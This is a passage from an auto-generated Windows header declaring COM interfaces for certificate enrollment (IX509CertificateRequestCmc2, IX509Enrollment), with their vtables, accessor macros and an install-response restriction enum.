            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHash )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificates )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *CheckCertificateSignature )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCertificate,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain);
        
        END_INTERFACE
    } IX509CertificateRequestCmc2Vtbl;

    interface IX509CertificateRequestCmc2
    {
        CONST_VTBL struct IX509CertificateRequestCmc2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCmc2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCmc2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCmc2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCmc2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCmc2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCmc2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCmc2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCmc2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCmc2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCmc2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCmc2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCmc2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCmc2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCmc2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCmc2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCmc2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCmc2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCmc2_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCmc2_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestCmc2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCmc2_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName) ) 

#define IX509CertificateRequestCmc2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_TransactionId(This,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_TransactionId(This,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SenderNonce(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SenderNonce(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_SenderNonce(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SenderNonce(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_ArchivePrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ArchivePrivateKey(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ArchivePrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_ArchivePrivateKey(This,Value) ) 

#define IX509CertificateRequestCmc2_get_KeyArchivalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_KeyArchivalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_KeyArchivalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyArchivalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestCmc2_get_EncryptedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHash(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_get_SignerCertificates(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificates(This,ppValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCmc2_InitializeFromInnerRequestTemplate(This,pInnerRequest,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplate(This,pInnerRequest,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCmc2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestCmc2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509CertificateRequestCmc2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCmc2_CheckCertificateSignature(This,pSignerCertificate,ValidateCertificateChain)	\
    ( (This)->lpVtbl -> CheckCertificateSignature(This,pSignerCertificate,ValidateCertificateChain) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCmc2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0086 */
/* [local] */ 

typedef 
enum InstallResponseRestrictionFlags
    {
        AllowNone	= 0,
        AllowNoOutstandingRequest	= 0x1,
        AllowUntrustedCertificate	= 0x2,
        AllowUntrustedRoot	= 0x4
    } 	InstallResponseRestrictionFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0086_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0086_v0_0_s_ifspec;

#ifndef __IX509Enrollment_INTERFACE_DEFINED__
#define __IX509Enrollment_INTERFACE_DEFINED__

/* interface IX509Enrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Enrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab346-217d-11da-b2a4-000e7bbb2b09")
    IX509Enrollment : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromRequest( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateRequest( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Enroll( void) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InstallResponse( 
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreatePFX( 
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Request( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentContext( 
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Response( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CertificateFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CertificateFriendlyName( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CertificateDescription( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CertificateDescription( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAConfigString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Enrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Enrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Enrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Enrollment * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromRequest )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateRequest )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509Enrollment * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *CreatePFX )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Response )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateDescription )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateDescription )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAConfigString )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509EnrollmentVtbl;

    interface IX509Enrollment
    {
        CONST_VTBL struct IX509EnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Enrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Enrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Enrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Enrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Enrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Enrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Enrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Enrollment_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509Enrollment_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509Enrollment_InitializeFromRequest(This,pRequest)	\
    ( (This)->lpVtbl -> InitializeFromRequest(This,pRequest) ) 

#define IX509Enrollment_CreateRequest(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequest(This,Encoding,pValue) ) 

#define IX509Enrollment_Enroll(This)	\
    ( (This)->lpVtbl -> Enroll(This) ) 

#define IX509Enrollment_InstallResponse(This,Restrictions,strResponse,Encoding,strPassword)	\
    ( (This)->lpVtbl -> InstallResponse(This,Restrictions,strResponse,Encoding,strPassword) ) 

#define IX509Enrollment_CreatePFX(This,strPassword,ExportOptions,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreatePFX(This,strPassword,ExportOptions,Encoding,pValue) ) 

#define IX509Enrollment_get_Request(This,pValue)	\
    ( (This)->lpVtbl -> get_Request(This,pValue) ) 

#define IX509Enrollment_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509Enrollment_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509Enrollment_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509Enrollment_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509Enrollment_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509Enrollment_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509Enrollment_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509Enrollment_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509Enrollment_get_Response(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Response(This,Encoding,pValue) ) 

#define IX509Enrollment_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509Enrollment_put_CertificateFriendlyName(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,strValue) ) 

#define IX509Enrollment_get_CertificateDescription(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateDescription(This,pValue) ) 

#define IX509Enrollment_put_CertificateDescription(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateDescription(This,strValue) ) 

#define IX509Enrollment_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define IX509Enrollment_get_CAConfigString(This,pValue)	\
    ( (This)->lpVtbl -> get_CAConfigString(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Enrollment_INTERFACE_DEFINED__ */


#ifndef __IX509Enrollment2_INTERFACE_DEFINED__
#define __IX509Enrollment2_INTERFACE_DEFINED__

/* interface IX509Enrollment2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Enrollment2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
